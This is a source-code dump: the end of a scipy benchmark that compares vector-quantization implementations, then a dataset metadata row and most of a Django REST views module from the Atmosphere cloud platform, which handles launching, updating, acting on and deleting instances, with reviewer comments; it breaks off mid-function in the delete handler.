float* raw_min_dist = (float*)(py_min_dist->data);
%(type)s* raw_obs = obs.data();
%(type)s* raw_code_book = code_book.data();
%(type)s* this_obs = NULL;
%(type)s* this_code = NULL;
int Nfeatures = Nobs[1];
float diff,dist;
for(int i=0; i < Nobs[0]; i++)
{
this_obs = &raw_obs[i*Nfeatures];
raw_min_dist[i] = (%(type)s)10000000.; // big number
for(int j=0; j < Ncode_book[0]; j++)
{
this_code = &raw_code_book[j*Nfeatures];
dist = 0;
for(int k=0; k < Nfeatures; k++)
{
diff = this_obs[k] - this_code[k];
dist += diff*diff;
}
dist = dist;
if (dist < raw_min_dist[i])
{
raw_code[i] = j;
raw_min_dist[i] = dist;
}
}
raw_min_dist[i] = sqrt(raw_min_dist[i]);
}
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
code, distortion = inline_tools.inline(code,['obs','code_book'],
type_converters = blitz_type_converters,
compiler = 'gcc',
verbose = 1)
return code, distortion
def vq3(obs,code_book):
""" Uses standard array conversion completely bi-passing blitz.
THIS DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
"""
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
assert(obs_sh[1] == code_book_sh[1])
assert(obs.typecode() == code_book.typecode())
type = c_spec.num_to_c_types[obs.typecode()]
code = """
#line 139 "vq.py"
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
int* code_data = (int*)(py_code->data);
float* min_dist_data = (float*)(py_min_dist->data);
%(type)s* this_obs = NULL;
%(type)s* this_code = NULL;
int Nfeatures = Nobs[1];
float diff,dist;
for(int i=0; i < Nobs[0]; i++)
{
this_obs = &obs_data[i*Nfeatures];
min_dist_data[i] = (float)10000000.; // big number
for(int j=0; j < Ncode_book[0]; j++)
{
this_code = &code_book_data[j*Nfeatures];
dist = 0;
for(int k=0; k < Nfeatures; k++)
{
diff = this_obs[k] - this_code[k];
dist += diff*diff;
}
if (dist < min_dist_data[i])
{
code_data[i] = j;
min_dist_data[i] = dist;
}
}
min_dist_data[i] = sqrt(min_dist_data[i]);
}
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
# this is an unpleasant way to specify type factories -- work on it.
import ext_tools
code, distortion = inline_tools.inline(code,['obs','code_book'])
return code, distortion
import time
import RandomArray
def compare(m,Nobs,Ncodes,Nfeatures):
obs = RandomArray.normal(0.,1.,(Nobs,Nfeatures))
codes = RandomArray.normal(0.,1.,(Ncodes,Nfeatures))
import scipy.cluster.vq
scipy.cluster.vq
print('vq with %d observation, %d features and %d codes for %d iterations' % \
(Nobs,Nfeatures,Ncodes,m))
t1 = time.time()
for i in range(m):
code,dist = scipy.cluster.vq.py_vq(obs,codes)
t2 = time.time()
py = (t2-t1)
print(' speed in python:', (t2 - t1)/m)
print(code[:2],dist[:2])
t1 = time.time()
for i in range(m):
code,dist = scipy.cluster.vq.vq(obs,codes)
t2 = time.time()
print(' speed in standard c:', (t2 - t1)/m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq(obs,codes)
t2 = time.time()
print(' speed inline/blitz:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq2(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq2(obs,codes)
t2 = time.time()
print(' speed inline/blitz2:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq3(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq3(obs,codes)
t2 = time.time()
print(' speed using C arrays:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
if __name__ == "__main__":
compare(100,1000,30,10)
#compare(1,10,2,10)
| 37.437751 | 105 | 0.528213 |
9f80cb05653257b69e22da09a62518cede6d3434 | 40,057 | py | Python | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.utils import timezone
from django.db.models import Q
from rest_framework import status
from rest_framework.response import Response
from threepio import logger
from core.exceptions import ProviderNotActive
from core.models import AtmosphereUser as User
from core.models.allocation_source import AllocationSource
from core.models.identity import Identity
from core.models.instance import convert_esh_instance
from core.models.instance import Instance as CoreInstance
from core.models.boot_script import _save_scripts_to_instance
from core.models.tag import Tag as CoreTag
from core.models.provider import Provider
from service import task
from service.cache import get_cached_instances,\
invalidate_cached_instances
from service.driver import prepare_driver
from service.exceptions import (
OverAllocationError, AllocationBlacklistedError, OverQuotaError,
SizeNotAvailable, HypervisorCapacityError, SecurityGroupNotCreated,
VolumeAttachConflict, VolumeMountConflict, InstanceDoesNotExist,
UnderThresholdError, ActionNotAllowed, Unauthorized,
# Technically owned by another
socket_error, ConnectionFailure, LibcloudInvalidCredsError, LibcloudBadResponseError
)
from service.instance import (
run_instance_action,
launch_instance)
from service.tasks.driver import update_metadata
from api.exceptions import (
failure_response, member_action_forbidden,
invalid_creds, connection_failure, malformed_response)
from api.decorators import emulate_user
from api.exceptions import (
inactive_provider, size_not_available, mount_failed, over_quota,
under_threshold, over_capacity, instance_not_found)
from api.pagination import OptionalPagination
from api.v1.serializers import InstanceStatusHistorySerializer,\
InstanceSerializer, InstanceHistorySerializer, VolumeSerializer,\
TagSerializer
from api.v1.views.base import AuthAPIView, AuthListAPIView
def get_core_instance(request, provider_uuid, identity_uuid, instance_id):
user = request.user
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
esh_instance = get_esh_instance(request, provider_uuid, identity_uuid,
instance_id)
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid, user)
return core_instance
def get_esh_instance(request, provider_uuid, identity_uuid, instance_id):
    """Fetch the live ('esh') instance object from the cloud provider.

    Returns the driver's instance, or ``None`` when the provider no longer
    reports the instance (in which case the matching core DB record is
    end-dated as a side effect).

    NOTE(review): on connection/credential/driver errors this function
    *returns* a DRF ``Response`` instead of raising, so callers may receive
    an instance, ``None``, or an error Response -- verify callers handle
    all three.
    """
    esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
    if not esh_driver:
        raise LibcloudInvalidCredsError(
            "Provider_uuid && identity_uuid "
            "did not produce a valid combination")
    esh_instance = None
    try:
        esh_instance = esh_driver.get_instance(instance_id)
    except (socket_error, ConnectionFailure):
        return connection_failure(provider_uuid, identity_uuid)
    except LibcloudInvalidCredsError:
        return invalid_creds(provider_uuid, identity_uuid)
    except Exception as exc:
        logger.exception("Encountered a generic exception. "
                         "Returning 409-CONFLICT")
        return failure_response(status.HTTP_409_CONFLICT,
                                str(exc.message))
    if not esh_instance:
        # End date everything
        # The provider no longer knows this instance: close out the DB
        # record (and its related rows) so history reflects reality.
        try:
            core_inst = CoreInstance.objects.get(
                provider_alias=instance_id,
                source__provider__uuid=provider_uuid,
                created_by_identity__uuid=identity_uuid)
            core_inst.end_date_all()
        except CoreInstance.DoesNotExist:
            pass
    return esh_instance
class InstanceList(AuthAPIView):
    """
    Instances are the objects created when you launch a machine. They are
    represented by a unique ID, randomly generated on launch, important
    attributes of an Instance are:
    Name, Status (building, active, suspended), Size, Machine"""
    def get(self, request, provider_uuid, identity_uuid):
        """
        Returns a list of all instances
        """
        user = request.user
        # Driver prep validates the provider/identity pair for this user.
        try:
            esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
        except ProviderNotActive as pna:
            return inactive_provider(pna)
        except Exception as e:
            return failure_response(
                status.HTTP_409_CONFLICT,
                e.message)
        if not esh_driver:
            return invalid_creds(provider_uuid, identity_uuid)
        # May raise Identity.DoesNotExist if the identity is not shared
        # with this user -- presumably surfaced as a 500; verify upstream.
        identity = Identity.shared_with_user(user).get(uuid=identity_uuid)
        try:
            # Cached cloud-side listing; invalidated on writes elsewhere.
            esh_instance_list = get_cached_instances(identity=identity)
        except LibcloudBadResponseError:
            return malformed_response(provider_uuid, identity_uuid)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        # Convert each cloud instance into its core (DB) representation.
        core_instance_list = [convert_esh_instance(esh_driver,
                                                   inst,
                                                   provider_uuid,
                                                   identity_uuid,
                                                   user)
                              for inst in esh_instance_list]
        # TODO: Core/Auth checks for shared instances
        serialized_data = InstanceSerializer(core_instance_list,
                                             context={"request": request},
                                             many=True).data
        response = Response(serialized_data)
        response['Cache-Control'] = 'no-cache'
        return response
    def post(self, request, provider_uuid, identity_uuid, format=None):
        """
        Instance Class:
        Launches an instance based on the params
        Returns a single instance
        Parameters: machine_alias, size_alias, username
        TODO: Create a 'reverse' using the instance-id to pass
        the URL for the newly created instance
        I.e: url = "/provider/1/instance/1/i-12345678"
        """
        data = request.data
        user = request.user
        # Check the data is valid
        missing_keys = valid_post_data(data)
        if missing_keys:
            return keys_not_found(missing_keys)
        # Launching requires leadership on the identity, not mere sharing.
        identity = Identity.shared_with_user(user, is_leader=True).filter(uuid=identity_uuid).first()
        if not identity:
            failure_msg = "User %s does not have permission to POST with this identity. Promote user to leader or use a different Identity." % (user,)
            return failure_response(status.HTTP_403_FORBIDDEN, failure_msg)
        # Pass these as args
        size_alias = data.pop("size_alias")
        allocation_source_uuid = data.pop("allocation_source_uuid",None)
        machine_alias = data.pop("machine_alias")
        hypervisor_name = data.pop("hypervisor", None)
        if hypervisor_name:
            # Previous method passed this with 'None' but that fails now.
            # This check will only add the ex_ value if it is 'truthy'.
            data['ex_hypervisor_name'] = hypervisor_name
        # Normalize 'deploy': accept the string "false" (any case) from
        # clients; anything that is not a bool defaults to True.
        # NOTE: `unicode` here means this module targets Python 2.
        deploy = data.pop("deploy", True)
        if type(deploy) in [str, unicode] and deploy.lower() == "false":
            deploy = False
        elif not isinstance(deploy, bool):
            deploy = True
        boot_scripts = data.pop("scripts", [])
        try:
            logger.debug(data)
            # Raises AllocationSource.DoesNotExist when uuid is None or
            # unknown -- caught by the generic handler below (409).
            allocation_source = AllocationSource.objects.get(
                uuid=allocation_source_uuid)
            core_instance = launch_instance(
                user, identity_uuid,
                size_alias, machine_alias,
                deploy=deploy,
                allocation_source=allocation_source,
                **data)
        except UnderThresholdError as ute:
            return under_threshold(ute)
        except OverQuotaError as oqe:
            return over_quota(oqe)
        except OverAllocationError as oae:
            return over_quota(oae)
        except AllocationBlacklistedError as e:
            return failure_response(
                status.HTTP_403_FORBIDDEN,
                e.message)
        except Unauthorized:
            return invalid_creds(provider_uuid, identity_uuid)
        except SizeNotAvailable as snae:
            return size_not_available(snae)
        except SecurityGroupNotCreated:
            return connection_failure(provider_uuid, identity_uuid)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        serializer = InstanceSerializer(core_instance,
                                        context={"request": request},
                                        data=data)
        if serializer.is_valid():
            instance = serializer.save()
            if boot_scripts:
                _save_scripts_to_instance(instance, boot_scripts)
            instance.change_allocation_source(allocation_source)
            logger.info("DEBUG- Instance launch completed - Returning instance %s (%s) to user %s" % (instance, instance.created_by_identity, request.user))
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        else:
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
def _sort_instance_history(history_instance_list, sort_by, descending=False):
    """Sort instance history by 'end_date' (default) or 'start_date'.

    Open-ended records (missing end/start date) sort as "now" so they group
    with the most recent entries.

    FIX: an unrecognized ``sort_by`` previously fell off the end of the
    if/elif chain and implicitly returned ``None``, breaking callers that
    expect a list; it now falls back to the default end_date ordering.
    """
    # Using the 'sort_by' variable, sort the list:
    if not sort_by or 'end_date' in sort_by:
        key = lambda ish: ish.end_date if ish.end_date else timezone.now()
    elif 'start_date' in sort_by:
        key = lambda ish: ish.start_date if ish.start_date else timezone.now()
    else:
        # Unknown sort key: use the default (end_date) ordering.
        key = lambda ish: ish.end_date if ish.end_date else timezone.now()
    return sorted(history_instance_list, key=key, reverse=descending)
def _filter_instance_history(history_instance_list, params):
    """Narrow an instance-history queryset using request query parameters.

    Recognized keys: start_date, end_date, ip_address, alias. Unrecognized
    keys are ignored.
    """
    queryset = history_instance_list
    for filter_key, value in params.items():
        if filter_key == 'start_date':
            queryset = queryset.filter(start_date__gt=value)
        elif filter_key == 'end_date':
            # Records that are still open (no end date) always match.
            queryset = queryset.filter(
                Q(end_date=None) |
                Q(end_date__lt=value))
        elif filter_key == 'ip_address':
            queryset = queryset.filter(ip_address__contains=value)
        elif filter_key == 'alias':
            queryset = queryset.filter(provider_alias__contains=value)
    return queryset
class InstanceHistory(AuthListAPIView):
    """Instance history for a specific user."""
    # Pagination is optional so clients can fetch the full history at once.
    pagination_class = OptionalPagination
    serializer_class = InstanceHistorySerializer
    @emulate_user
    def get_queryset(self):
        """
        Authentication required, Retrieve a list of previously launched
        instances.

        Supports ?sort_by= (end_date/start_date), ?order_by= (asc/desc),
        and the filters handled by _filter_instance_history.
        """
        # List of all instances created by user
        sort_by = self.request.query_params.get('sort_by', '')
        order_by = self.request.query_params.get('order_by', 'desc')
        history_instance_list = CoreInstance.objects.filter(
            created_by=self.request.user).order_by("-start_date")
        # Query-string filtering happens on the queryset (DB-side)...
        history_instance_list = _filter_instance_history(
            history_instance_list, self.request.query_params)
        # ...while sorting materializes the queryset into a Python list.
        history_instance_list = _sort_instance_history(
            history_instance_list, sort_by, 'desc' in order_by.lower())
        return history_instance_list
class InstanceHistoryDetail(AuthAPIView):
    """
    Instance history for specific instance.
    """
    def get(self, request, instance_id):
        """
        Authentication required, Retrieve a list of previously launched
        instances.

        Staff users may pass ?username=<name> to view another user's
        history. NOTE(review): this user-lookup/emulation logic is
        duplicated in InstanceStatusHistoryDetail -- consider a shared
        helper.
        """
        params = request.query_params.copy()
        user = User.objects.filter(username=request.user)
        if user and len(user) > 0:
            user = user[0]
        else:
            # NOTE(review): 401 is returned for "not found" cases
            # throughout this view; 404 would be more conventional, but
            # existing clients may depend on 401.
            return failure_response(status.HTTP_401_UNAUTHORIZED,
                                    'Request User %s not found' %
                                    user)
        emulate_name = params.pop('username', None)
        # Support for staff users to emulate a specific user history
        if user.is_staff and emulate_name:
            emulate_name = emulate_name[0]  # Querystring conversion
            user = User.objects.filter(username=emulate_name)
            if user and len(user) > 0:
                user = user[0]
            else:
                return failure_response(status.HTTP_401_UNAUTHORIZED,
                                        'Emulated User %s not found' %
                                        emulate_name)
        # List of all instances matching user, instance_id
        core_instance =\
            CoreInstance.objects.filter(
                created_by=user,
                provider_alias=instance_id).order_by("-start_date")
        if core_instance and len(core_instance) > 0:
            core_instance = core_instance[0]
        else:
            return failure_response(status.HTTP_401_UNAUTHORIZED,
                                    'Instance %s not found' %
                                    instance_id)
        # NOTE(review): a single instance is serialized with many=True;
        # confirm whether clients expect a list-shaped payload here.
        serialized_data = InstanceHistorySerializer(
            core_instance,
            context={"request": request},
            many=True).data
        response = Response(serialized_data)
        response['Cache-Control'] = 'no-cache'
        return response
class InstanceStatusHistoryDetail(AuthAPIView):
    """
    List of instance status history for specific instance.
    """
    def get(self, request, instance_id):
        """
        Authentication required, Retrieve a list of previously launched
        instances.

        Returns the ordered status transitions for the most recent
        instance matching ``instance_id``. Staff users may pass
        ?username=<name> to inspect another user's instance.
        NOTE(review): the user-lookup/emulation block is duplicated from
        InstanceHistoryDetail.
        """
        params = request.query_params.copy()
        user = User.objects.filter(username=request.user)
        if user and len(user) > 0:
            user = user[0]
        else:
            return failure_response(status.HTTP_401_UNAUTHORIZED,
                                    'Request User %s not found' %
                                    user)
        emulate_name = params.pop('username', None)
        # Support for staff users to emulate a specific user history
        if user.is_staff and emulate_name:
            emulate_name = emulate_name[0]  # Querystring conversion
            user = User.objects.filter(username=emulate_name)
            if user and len(user) > 0:
                user = user[0]
            else:
                return failure_response(status.HTTP_401_UNAUTHORIZED,
                                        'Emulated User %s not found' %
                                        emulate_name)
        # List of all instances matching user, instance_id
        core_instance = CoreInstance.objects.filter(
            created_by=user,
            provider_alias=instance_id).order_by("-start_date")
        if core_instance and len(core_instance) > 0:
            core_instance = core_instance[0]
        else:
            return failure_response(status.HTTP_401_UNAUTHORIZED,
                                    'Instance %s not found' %
                                    instance_id)
        # Oldest-first status transitions for the selected instance.
        status_history = core_instance\
            .instancestatushistory_set.order_by('start_date')
        serialized_data = InstanceStatusHistorySerializer(
            status_history, many=True).data
        response = Response(serialized_data)
        response['Cache-Control'] = 'no-cache'
        return response
def _further_process_result(request, action, result):
    """
    Provide additional serialization if the `action` has a
    `result` requiring processing.

    Volume actions produce a Volume object that must be serialized before
    it can be returned to the client; every other action's result is
    passed through untouched.
    """
    if 'volume' not in action:
        return result
    return VolumeSerializer(result, context={"request": request}).data
class InstanceAction(AuthAPIView):
    """
    This endpoint will allow you to run a specific action on an instance.
    The GET method will retrieve all available actions and any parameters
    that are required.
    The POST method expects DATA: {"action":...}
    Returns: 200, data: {'result':'success',...}
    On Error, a more specific message applies.
    Data variables:
    ___
    * action - The action you wish to take on your instance
    * action_params - any parameters required (as detailed on the api) to
    run the requested action.
    Instances are the objects created when you launch a machine. They are
    represented by a unique ID, randomly generated on launch, important
    attributes of an Instance are:
    Name, Status (building, active, suspended), Size, Machine
    """
    def get(self, request, provider_uuid, identity_uuid, instance_id):
        """Authentication Required, List all available instance actions,
        including necessary parameters.
        """
        # FIX: the 'mount_volume'/'unmount_volume' descriptions were
        # swapped, and 'reboot' was described as "Stop the instance."
        actions = [
            {"action": "attach_volume",
             "action_params": {
                 "volume_id": "required",
                 "device": "optional",
                 "mount_location": "optional"},
             "description": "Attaches the volume <id> to instance"},
            {"action": "mount_volume",
             "action_params": {
                 "volume_id": "required",
                 "device": "optional",
                 "mount_location": "optional"},
             "description": "Mount the volume <id> to instance"},
            {"action": "unmount_volume",
             "action_params": {"volume_id": "required"},
             "description": "Unmount the volume <id> from instance"},
            {"action": "detach_volume",
             "action_params": {"volume_id": "required"},
             "description": "Detaches the volume <id> from instance"},
            {"action": "resize",
             "action_params": {"size": "required"},
             "description": "Resize instance to size <id>"},
            {"action": "confirm_resize",
             "description": "Confirm the instance works after resize."},
            {"action": "revert_resize",
             "description": "Revert the instance if resize fails."},
            {"action": "suspend",
             "description": "Suspend the instance."},
            {"action": "resume",
             "description": "Resume the instance."},
            {"action": "start",
             "description": "Start the instance."},
            {"action": "stop",
             "description": "Stop the instance."},
            {"action": "reboot",
             "action_params": {"reboot_type (optional)": "SOFT/HARD"},
             "description": "Reboot the instance."},
            {"action": "console",
             "description": "Get noVNC Console."}]
        response = Response(actions, status=status.HTTP_200_OK)
        return response
    def post(self, request, provider_uuid, identity_uuid, instance_id):
        """Authentication Required, Attempt a specific instance action,
        including necessary parameters.
        """
        # Service-specific call to action
        action_params = request.data
        if not action_params.get('action', None):
            return failure_response(
                status.HTTP_400_BAD_REQUEST,
                'POST request to /action require a BODY with \'action\'.')
        result_obj = None
        user = request.user
        identity = Identity.objects.get(uuid=identity_uuid)
        action = action_params['action']
        try:
            # Actions require leadership on the (shared) instance.
            if not can_use_instance(user, instance_id, leader_required=True):
                return member_action_forbidden(user.username, "Instance", instance_id)
            result_obj = run_instance_action(user, identity, instance_id, action, action_params)
            # Volume actions need their result serialized before returning.
            result_obj = _further_process_result(request, action, result_obj)
            api_response = {
                'result': 'success',
                'message': 'The requested action <%s> was run successfully' % (action_params['action'],),
                'object': result_obj,
            }
            response = Response(api_response, status=status.HTTP_200_OK)
            return response
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except ProviderNotActive as pna:
            return inactive_provider(pna)
        except InstanceDoesNotExist:
            return failure_response(
                status.HTTP_404_NOT_FOUND,
                'Instance %s no longer exists' % (instance_id,))
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except HypervisorCapacityError as hce:
            return over_capacity(hce)
        except OverQuotaError as oqe:
            return over_quota(oqe)
        except OverAllocationError as oae:
            return over_quota(oae)
        except AllocationBlacklistedError as e:
            return failure_response(
                status.HTTP_403_FORBIDDEN,
                e.message)
        except SizeNotAvailable as snae:
            return size_not_available(snae)
        except VolumeMountConflict as vmc:
            return mount_failed(vmc)
        # FIX: this previously caught `NotImplemented` (the comparison
        # singleton, not an exception class), which can never match a
        # raised NotImplementedError.
        except NotImplementedError:
            return failure_response(
                status.HTTP_409_CONFLICT,
                "The requested action %s is not available on this provider."
                % action_params['action'])
        except ActionNotAllowed:
            return failure_response(
                status.HTTP_409_CONFLICT,
                "The requested action %s has been explicitly "
                "disabled on this provider." % action_params['action'])
        except Exception as exc:
            logger.exception("Exception occurred processing InstanceAction")
            message = exc.message
            if message.startswith('409 Conflict'):
                return failure_response(
                    status.HTTP_409_CONFLICT,
                    message)
            return failure_response(
                status.HTTP_403_FORBIDDEN,
                "The requested action %s encountered "
                "an irrecoverable exception: %s"
                % (action_params['action'], message))
class Instance(AuthAPIView):
    """
    Instances are the objects created when you launch a machine. They are
    represented by a unique ID, randomly generated on launch, important
    attributes of an Instance are:
    Name, Status (building, active, suspended), Size, Machine
    """
    def get(self, request, provider_uuid, identity_uuid, instance_id):
        """
        Authentication Required, get instance details.
        """
        user = request.user
        # NOTE: This 'Scheme' should be used across
        # the ENTIRE API v1 (Machines, Volumes, Sizes)
        # NOTE: Especially the part below, where you end date
        # all the things that are 'inactive'
        try:
            provider = Provider.objects.get(uuid=provider_uuid)
            if not provider.is_current():
                raise ProviderNotActive(provider)
        except Provider.DoesNotExist:
            return invalid_creds(provider_uuid, identity_uuid)
        except ProviderNotActive as pna:
            return inactive_provider(pna)
        # Cleared provider testing -- ready for driver prep.
        try:
            esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
            if not esh_driver:
                return invalid_creds(provider_uuid, identity_uuid)
            logger.info("InstanceQuery Looking for %s" % instance_id)
            esh_instance = esh_driver.get_instance(instance_id)
            logger.info("InstanceQuery Found instance %s" % esh_instance)
        except (socket_error, ConnectionFailure):
            logger.exception("Connection failure prevented InstanceQuery")
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            logger.exception("Invalid credentialsprevented InstanceQuery")
            return invalid_creds(provider_uuid, identity_uuid)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        # NOTE: Especially THIS part below, where you end date all the
        # things that are 'inactive'
        if not esh_instance:
            # Cloud no longer knows the instance -- end-date the DB record
            # before returning 404.
            try:
                core_inst = CoreInstance.objects.get(
                    provider_alias=instance_id,
                    source__provider__uuid=provider_uuid,
                    created_by_identity__uuid=identity_uuid)
                core_inst.end_date_all()
            except CoreInstance.DoesNotExist:
                pass
            return instance_not_found(instance_id)
        core_instance = convert_esh_instance(esh_driver, esh_instance,
                                             provider_uuid, identity_uuid,
                                             user)
        serialized_data = InstanceSerializer(
            core_instance,
            context={"request": request}).data
        response = Response(serialized_data)
        response['Cache-Control'] = 'no-cache'
        return response
    def patch(self, request, provider_uuid, identity_uuid, instance_id):
        """Authentication Required, update metadata about the instance"""
        user = request.user
        data = request.data
        esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
        if not esh_driver:
            return invalid_creds(provider_uuid, identity_uuid)
        # NOTE(review): member_action_forbidden is called with 2 args here
        # but with 3 args ("Instance" label) in InstanceAction -- confirm
        # which signature is intended.
        if not can_use_instance(user, instance_id, leader_required=True):
            return member_action_forbidden(user.username, instance_id)
        try:
            esh_instance = esh_driver.get_instance(instance_id)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        if not esh_instance:
            return instance_not_found(instance_id)
        # Gather the DB related item and update
        core_instance = convert_esh_instance(esh_driver, esh_instance,
                                             provider_uuid, identity_uuid,
                                             user)
        # partial=True: PATCH applies only the supplied fields.
        serializer = InstanceSerializer(
            core_instance, data=data,
            context={"request": request}, partial=True)
        identity = Identity.objects.get(uuid=identity_uuid)
        provider = identity.provider
        if serializer.is_valid():
            logger.info('metadata = %s' % data)
            driver_class = esh_driver.__class__
            # .apply() runs the celery task synchronously in-process.
            update_metadata.s(driver_class, provider, identity, esh_instance.id,
                              data, replace_metadata=False).apply()
            instance = serializer.save()
            boot_scripts = data.pop('boot_scripts', [])
            if boot_scripts:
                _save_scripts_to_instance(instance, boot_scripts)
            invalidate_cached_instances(identity=identity)
            response = Response(serializer.data)
            logger.info('data = %s' % serializer.data)
            response['Cache-Control'] = 'no-cache'
            return response
        else:
            return Response(
                serializer.errors,
                status=status.HTTP_400_BAD_REQUEST)
    def put(self, request, provider_uuid, identity_uuid, instance_id):
        """Authentication Required, update metadata about the instance"""
        user = request.user
        data = request.data
        # Ensure item exists on the server first
        esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
        if not esh_driver:
            return invalid_creds(provider_uuid, identity_uuid)
        if not can_use_instance(user, instance_id, leader_required=True):
            return member_action_forbidden(user.username, instance_id)
        try:
            esh_instance = esh_driver.get_instance(instance_id)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        if not esh_instance:
            return instance_not_found(instance_id)
        # Gather the DB related item and update
        core_instance = convert_esh_instance(esh_driver, esh_instance,
                                             provider_uuid, identity_uuid,
                                             user)
        # Full (non-partial) update: PUT replaces the serializable fields.
        serializer = InstanceSerializer(core_instance, data=data,
                                        context={"request": request})
        identity = Identity.objects.get(uuid=identity_uuid)
        if serializer.is_valid():
            logger.info('metadata = %s' % data)
            #NOTE: We shouldn't allow 'full replacement' of metadata..
            # We should also validate against potentional updating of 'atmo-used metadata'
            update_metadata.s(esh_driver.__class__, esh_driver.provider, esh_driver.identity, esh_instance.id,
                              data, replace_metadata=False).apply()
            new_instance = serializer.save()
            boot_scripts = data.pop('boot_scripts', [])
            if boot_scripts:
                # Re-serialize so the response reflects the saved scripts.
                new_instance = _save_scripts_to_instance(new_instance,
                                                         boot_scripts)
                serializer = InstanceSerializer(
                    new_instance,
                    context={"request": request})
            invalidate_cached_instances(identity=identity)
            response = Response(serializer.data)
            logger.info('data = %s' % serializer.data)
            response['Cache-Control'] = 'no-cache'
            return response
        else:
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
    def delete(self, request, provider_uuid, identity_uuid, instance_id):
        """Authentication Required, TERMINATE the instance.
        Be careful, there is no going back once you've deleted an instance.
        """
        user = request.user
        esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
        if not esh_driver:
            return invalid_creds(provider_uuid, identity_uuid)
        if not can_use_instance(user, instance_id, leader_required=True):
            return member_action_forbidden(user.username, instance_id)
        try:
            esh_instance = esh_driver.get_instance(instance_id)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        try:
            # Test that there is not an attached volume BEFORE we destroy
            task.destroy_instance_task(user, esh_instance, identity_uuid)
            invalidate_cached_instances(
                identity=Identity.objects.get(uuid=identity_uuid))
            # Re-fetch: the instance may linger while deletion is queued.
            existing_instance = esh_driver.get_instance(instance_id)
        except VolumeAttachConflict as exc:
            message = exc.message
            return failure_response(status.HTTP_409_CONFLICT, message)
        except (socket_error, ConnectionFailure):
            return connection_failure(provider_uuid, identity_uuid)
        except LibcloudInvalidCredsError:
            return invalid_creds(provider_uuid, identity_uuid)
        except InstanceDoesNotExist as dne:
            return failure_response(
                status.HTTP_404_NOT_FOUND,
                "Instance %s does not exist" % instance_id)
        except Exception as exc:
            logger.exception("Encountered a generic exception. "
                             "Returning 409-CONFLICT")
            return failure_response(status.HTTP_409_CONFLICT,
                                    str(exc.message))
        try:
            core_instance = None
            if existing_instance:
                # Instance will be deleted soon...
                esh_instance = existing_instance
                # Surface a transient 'task' so clients see deletion status.
                if esh_instance.extra\
                        and 'task' not in esh_instance.extra:
                    esh_instance.extra['task'] = 'queueing delete'
                core_instance = convert_esh_instance(esh_driver, esh_instance,
                                                     provider_uuid, identity_uuid,
                                                     user)
            if not core_instance:
                logger.warn("Unable to find core instance %s." % (instance_id))
